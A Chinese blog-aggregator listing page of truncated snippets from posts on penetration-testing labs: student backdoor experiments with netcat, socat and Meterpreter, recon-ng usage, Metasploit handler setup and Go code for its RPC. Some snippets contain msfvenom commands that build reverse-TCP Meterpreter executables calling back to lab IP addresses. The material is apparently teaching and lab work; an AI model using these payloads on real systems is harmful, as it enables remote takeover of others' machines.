2019 2020 2 20175203马羽达《网络对抗技术》Exp2 后门原理与实践 任务 1.实验内容 1.1使用netcat获取主机操作Shell,cron启动 1.2使用socat获取主机操作Shell, 任务计划启动 1.3使用MSF meterpreter(或其他软件)生成可执行文件,利 ...
分类:
其他好文 时间:
2020-03-14 12:55:53
阅读次数:
46
2019 2020 2 20175202葛旭阳《网络对抗技术》 Exp2 后门原理与实践 一、实验任务 1.使用netcat获取主机操作Shell,cron启动; 2.使用socat获取主机操作Shell, 任务计划启动; 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用nc ...
分类:
其他好文 时间:
2020-03-13 10:16:09
阅读次数:
67
一、实验目标 清楚后门概念 会用nc获取远程主机的Shell 会用meterpreter 会启动后门 二、实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat ...
分类:
其他好文 时间:
2020-03-13 01:02:54
阅读次数:
90
recon-ng全特性web侦察框架,基于python编写,命令和msf相似 使用 启动前 recon-ng -h(帮助文档) recon-ng -w (创建工作区) -r(加载你以前创建的命令文件)--no-check(不检查版本启动) 进入后 help 帮助文档 use 使用模块 show mo ...
分类:
其他好文 时间:
2020-03-06 15:36:49
阅读次数:
80
1、msf创建监听 msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterp ...
分类:
Web程序 时间:
2020-03-06 11:14:11
阅读次数:
110
Interacting with Metasploit msf.go package rpc import ( "bytes" "fmt" "gopkg.in/vmihailenco/msgpack.v2" "net/http" ) // Build the Go types to handle b ...
分类:
Web程序 时间:
2020-02-27 00:29:47
阅读次数:
101
一、payload 1.windwos msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe > shell.exe msfvenom -p ...
分类:
其他好文 时间:
2020-02-26 14:09:12
阅读次数:
84
被控端生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线:msf5 > use exploit/mul ...
分类:
其他好文 时间:
2020-02-23 14:34:30
阅读次数:
295
https://www.cnblogs.com/test404/p/10599981.html + msf 派生 shell 给 Cobalt strike(前提有一个meterpreter) + Cobalt strike 派生 shell 给 MSF(前提有个beaconshell) 之后使用C ...
分类:
Web程序 时间:
2020-02-23 11:18:48
阅读次数:
90
两种方式 msf生成的payload分为正向和反向两种,正向需要正向连接,反向需要反向连接,反向是最常用的方式 正向连接指被攻击的目标机器通过正向的payload打开一个端口,攻击者的机器去连接目标机器的这个端口,从而建立连接 如果把攻击机器比喻成你,目标机器比喻成妹子,正向连接相当于你去追追妹子, ...
分类:
其他好文 时间:
2020-02-22 21:32:00
阅读次数:
376